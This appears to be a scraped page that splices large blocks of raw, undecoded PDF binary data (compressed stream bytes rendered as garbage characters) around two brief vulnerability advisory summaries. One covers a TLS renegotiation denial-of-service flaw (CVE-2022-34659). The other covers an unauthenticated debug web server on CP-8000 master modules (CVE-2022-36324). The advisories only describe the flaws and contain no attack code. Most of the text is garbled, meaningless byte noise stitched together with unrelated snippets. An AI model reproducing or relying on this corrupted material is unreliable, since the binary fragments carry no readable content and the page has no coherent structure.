�)|r�@L�p?v=j��y".� :8Đ�;��� T���o��;fv�\\We�bo-Xi�<2��9���S��� Z��M�lg� �q�X�t��5�~����^����U�xL��^�$\[^����2��KW�dX��v\_q|��7�3��K7�M}e+�K�"���e(��l�E�W���ӋȻ��ˈ��ʿ3��}��EY Dyp����4��W�EP6���+n�T<#����3�\`a�a\*ϊ�3�VV�rY,7�(c�� $$�k��n�3�V��P��L�ogS�(�cӬ�o�> stream xڥ�r�8�=\_ᚗ��6�ʛ�I�z\*ݝ��LmMOM 1;6x$���=ґ����}H@���o&��}�����|��Hz2\`�h�8 ��(��4���o�2϶YQ�cF�2K��;����WM��\*ȉc@.k�;�o�e�$��z�����ꗋ���\_"#z @x!��d{���d�·\_F��2��ۑ/�'|�����0���� E���0 ��}�"�RlD�'E$��"�G��r�PL~��� �A��(|�n�H�W#����#��Cv�x�\* �.�W���b~���������Fx�INo�Il���3P:���\\��1g��f\_�����g���K��l�|�v9u^�<1�r�k���"� �;!��S\\��E�mw'��>\]��"�\*��N���L�4��k�rC��I�<����9,�\`wh��|��XG񄠦H��u�ś��^��lR���E��k+�ޠ�+���!N�;�<\*�0�@2t�ʾ���z��~���W�0VyL��\\�������g����Yx�\`��x����t���Ϧ���1l��#� R!�'xJj���1p"��fS�֤?��4��U����DC�1(��R�̀� \]&��|g��p�t���&��.u���>�\_.qC�+�} �Z�����g� '�WH|�E�� �x��+�Q�!�E\_�B�y�c�g\`��i3���'�g��N��zW\]N&///������j��?M�窚��n�\*�u>A �+W�� N>����

CVE-2022-34659

Affected devices do not properly handle the renegotiation of SSL/TLS parameters. This could allow an unauthenticated remote attacker to bypass the TCP brute force prevention and lead to a denial of service condition for the duration of the attack.

%PDF-1.5 %���� 462 0 obj << /Length 2330 /Filter /FlateDecode >> stream x��Z�r��}�W�� G�/��P�U7�l\]�rr+�MB2\*�����Y@ E��Ry� 40=�=gΜ����GW'g�����DIe��FZ�H�QQ����)�ˤC��{�pZ$"���M��KVN��pL\_:�n�-&��:��K��~�g�������'�� �b$>���'�F��#ft���|��\`Hp��w����?>mzJH�5\]�S��ܣ/�C�+�Xa�:ԧ��(�1����W��j6����m�\*B\_�u&k&p3W��8\]�b�0W��O F��M\\P�8�§�@ؼ�o q�eE�� ��N�s��ب�#������1���D�x:��b�%gU��˙0��b�L��p��B\]��db�1M��d���-�6�����F�l��J!#�Τ0� |޽�~8�\\��4L�C�@��FK'���s�0��oK��V=r�Dآ��0���C�7�Lg����&�g�A��^ל�S������w\`/!���AY�1��#?J(B�(�!�1J�Q�ӢH�0�S�q�%��9�$��}�O������e�ᤰ()b�,�1�R$֟1�f��X�4�� ���&����{���Nު?�խ�N�vR ��i��Y

CVE-2022-36324

A vulnerability has been identified in CP-8000 MASTER MODULE WITH I/O -25/+70°C (All versions), CP-8000 MASTER MODULE WITH I/O -40/+70°C (All versions), CP-8021 MASTER MODULE (All versions), CP-8022 MASTER MODULE WITH GPRS (All versions). The component allows to activate a web server module which provides unauthenticated access to its web pages. This could allow an attacker to retrieve debug-level information from the component such as internal network topology or connected systems.

%PDF-1.5 %���� 45 0 obj << /Length 2475 /Filter /FlateDecode >> stream x��ZKs�8��W�R���17�qf=�ZK��V2Z��ҤG��Ϳ�n��H�V��S>$A�\_h|�4��D4���lv�杢�#Ns��"C��:2��L4\[D��4�O�r8����|�������t�t :��n�|�nM�,��z�:���������'���ND#�5@#X4�?��'������l�͏���DI�,�����VNտ-��Q�P�ɴ�8#7"C|D�qҘf��#L�\*@���J��CL)�x��7��$��g�v��(�ɶ������$\_��x���\\3��c�&F�/���Y�G��@8v�&�h;r��!.�}�3�����6��������1��P�\*dy��o��֞�j�;� fp�+�'ָC~�0)Mۏ�#{$WD����ႁ9��P\*"�a�'�gss\_���;l7�X&��޵%���LgD�æcz� l)��H�QO�P���H����䄃z����P��v\_1���(�}�L�Q�,�z���)�A�aڹ����<��>dKC(T�c<���=D89�b� ��\`�4K��o���,%����1~�d�ktVC���o�U�+�q+��S�GԎ�C wĠ(����U�s���a�����%��0����A�,A;̖̲�GFh缏�i��(���L\*�1/�h��j���NА+�\\آJv� �X�� SD��t3�^����ڭ!J�H�B@��ٽ/�#�?z�BJ��﻿ �i�exHX�?Sʓ�pD\[���f<�M�JLr��\\��S�C���2b� ���7����d��������\*�~�v���<��\_��m� �xL�I����,Vż����6��}��2)�r( $��|1PEX�Ϝ���O#Ei�:�M�3Z�P��cH�d ݬ=�C����~��3�� �"<��'o.'5�\\��6�C����,��9FI+\\\[%!V��3 �I��i��i#X��=G����Y�է��W�/��� U=%����������3��7��9���ioU/�̠c�L�\]��϶(���L�N^M�o��z<ƃ����t}��1��P0N�ż��d�Y��oT @��W��!n�jvϋu��8ˊ!���q���@7�ʀ>���lKl�� ^�f��ǧ9��2�W�w�wU�� a�Uki��k�!?� �-���v�������@y� \`">ܘm�2z����\*a���,��a��\_��ð�uHӇ�L�0$�~��Yֽ���>-������U^i�ZZ��meT<\_�~#���/��������9j\_���2�����X�:�й-���ta�ie��ae��L�������hU��6�M�9 �.���w%�U��!��H|���l���Rd��-�t��89��������� 4�q�^u���dgx��� �� {1/�-����\_�5;���g�v7�6�C��W�r�q<�4XM˯e�����  �K�^&\]���\[����d�4�T��uo^�~�L\\nzB�Ԫ�d��4���"ْ�.6.�s�!6n����=����w�.�go;�upХ��fL�Ϋ8s��x͈Q��(��Z�O�1xWoo�g���q.8$̢�. g� L��:b�9%�(�9��'B¨ö��^����-�iV���,���:�:��%�Z��&��ۺ�{\]���2�ʹ�Y'�=ƻ�j�j���\]m�p�i\`Y�h�$�gs���ݓ�﬏�.�2�k+�ܘv~��Z�ox<�0����>ET��P�e�H��DEU���p��v��z>z2�ImP��+\\X#!Ã�#�Z����uM�͖�bo���K��2I��8+�V\*{�-�.������"Ej�{�o)"��ѝ���a�����C!�= ���ŀ78��#s���#�8հ��\`I�)���E��%���Eu,\_�X\*�zm|b��zxb�ҩW�'Ȭ�߂N�Ͼ=dAR����X�N@G�|alb��5?�0�n���Ao��?���;Q� <�U\_|\`�k������\*D/�8��v㯎8����@������Vs� �sSo+,�᳎Z��c0� 񜿢{�O%���� Yp8��u���\_{�d\\&�u%�R�,V��s���-�)�S� endstream endobj 61 0 obj << /Length 3019 /Filter /FlateDecode >> stream xڭZ\[w�F~���-�� 4��)g���ג��'�,s������~��� Yq6�0#�Kuuu�W\_5���ǋ6�T�8pk�h��� ��Q2�6����.�\]^���F�:O�f���.�oԴʞ���FO����p����ۦ������\[������OW��\]HPHX�rBOZ����߅�A�O�p�8�^�ȝ�+�Q�ϥ���ǅ�M�dIG���Q\*�ˊ�\`"��� k"C�V���s"��N6# ǦEe��PO ���\[�X��v���\_�7��L��s�o�|��tEϿ\\o�FOo��h=KdAh���(!I�oB���G/��Jh��k�Ƿ̿fk�\_�>^�ĥ�N����,������-j8Q-��>9D7e���b6O��# �B}.��ɫ�d�j��M���X���ˤ��Lu8�A���hs}���B ;������=�C���pc;O;�\[^p\`�@/-�\[B?XǷ�w��%ϯ�r!! XXب�9!9���|j/Oy��+���� .醁�T5�\`�"�kB�V��yhvQ�6�v�.\_����-��\]z2��M���ϰTF-EE�zIO�v�ϒ��� ��'%u���yN�I���\[��H�#\]��ʲ5H�ݮ�G� �\]�}ԓ>%�.oС�AD�d�?�G�D N&�����FB�\\'��s�Gz� �Bɳ$���x��R���C���/w\_��������p��-J&���ې��xn���p g���TN7�����Q���K��\]�\[$�q��?���T������"�lx�島��cǏ|k�J�IO�D����>O��¾��� �2��,v^�qG�T��S\\\_eA��Q&@��QH�����0q��G���Kla}� ����.��8�%�=Gc�,ݖy����fYD)c݆:�Q+�?�#|�\*����z�%c+�R숲�I)���8���|G�� ����L��x���n��sc��-+���n��M�È��(ˏ����.��7�<���1���05|��%$X%�ꃔ�����\]\]~���h�}6J�Ō�D9"���n��ԏ�۩q�"5��g�F��PS����\]k��9q�$X?�7�/F,O�-:?�E���V\*�H�4\*i��o!s��'�cJ�|ۗ����vg�\_�@��P�#}QfFL\[�E^�;Ee2Ҝ��\_�ZY;W.�����VT\[��i:Rv�x����(��%U�օ���I�c�#�M�X\[mv�'�ç{�=GF|��Y��h�\[krf4�14Í�u��t�hz��.󔧸�|�O9ʦ0BS��J���Bdp>�� ���1þ�پ<�=|���^g�H �N����E��� ��AkME��/Vo���P�����MN����vKM^�l�cץ�!{�Y�k�+�bW���A�=R�7�wx<9���kguڃΔ�#�ڥp�^�w��xJ�td&E���(�����@�A�n��}�H�m��#���V\`���w�tſ}W�tcNJ��ŵ�ƴG�C��v&<)

Tag

#pdf